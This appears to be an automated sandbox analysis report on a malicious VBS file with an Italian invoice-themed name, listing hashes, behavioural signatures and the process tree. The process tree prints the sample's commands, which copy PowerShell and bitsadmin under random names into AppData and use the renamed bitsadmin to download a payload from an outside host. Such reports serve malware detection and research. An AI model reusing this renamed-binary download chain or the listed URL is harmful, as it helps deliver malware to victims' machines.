Analysis
-
max time kernel
86s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
20-05-2022 15:02
Static task
static1
Behavioral task
behavioral1
Sample
FattDiffEmessa2020 03799870369/FattDiffEmessa2020 03799870369.vbs
Resource
win7-20220414-en
General
-
Target
FattDiffEmessa2020 03799870369/FattDiffEmessa2020 03799870369.vbs
-
Size
3KB
-
MD5
ba1697038db097aae963962a1fd5dd15
-
SHA1
46e3f1b7e3c93f3de52d63a1afb3b6f6c17180b8
-
SHA256
79b59d0b510fb8855ee624fd51b46c2b4f1cccef9294860f9864f00183b07e2c
-
SHA512
d45c7b86124b760381e36eeb301c2fba631e38b3ba537187ca059238eb2692531dda9efaa0ed0806c2530794b9fcd4f70e872ff6da2984d31ea812e6e177fb64
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 1716 DrBqNtd.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 1912 wrote to memory of 3484 1912 WScript.exe 79 PID 1912 wrote to memory of 3484 1912 WScript.exe 79 PID 1912 wrote to memory of 3656 1912 WScript.exe 81 PID 1912 wrote to memory of 3656 1912 WScript.exe 81 PID 1912 wrote to memory of 1716 1912 WScript.exe 83 PID 1912 wrote to memory of 1716 1912 WScript.exe 83 PID 1912 wrote to memory of 1716 1912 WScript.exe 83
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FattDiffEmessa2020 03799870369\FattDiffEmessa2020 03799870369.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1912 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\pDrBqNtd.exe2⤵PID:3484
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\DrBqNtd.exe2⤵PID:3656
-
-
C:\Users\Admin\AppData\Roaming\DrBqNtd.exe"C:\Users\Admin\AppData\Roaming\DrBqNtd.exe" /transfer bHybPh /download https://ndjambo.com/jaluma/03799870369/it.gif C:\Users\Admin\AppData\Roaming\it.gif2⤵
- Executes dropped EXE
PID:1716
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
182KB
MD5f57a03fa0e654b393bb078d1c60695f3
SHA11ced6636bd2462c0f1b64775e1981d22ae57af0b
SHA256c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c
SHA5127e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a
-
Filesize
182KB
MD5f57a03fa0e654b393bb078d1c60695f3
SHA11ced6636bd2462c0f1b64775e1981d22ae57af0b
SHA256c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c
SHA5127e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a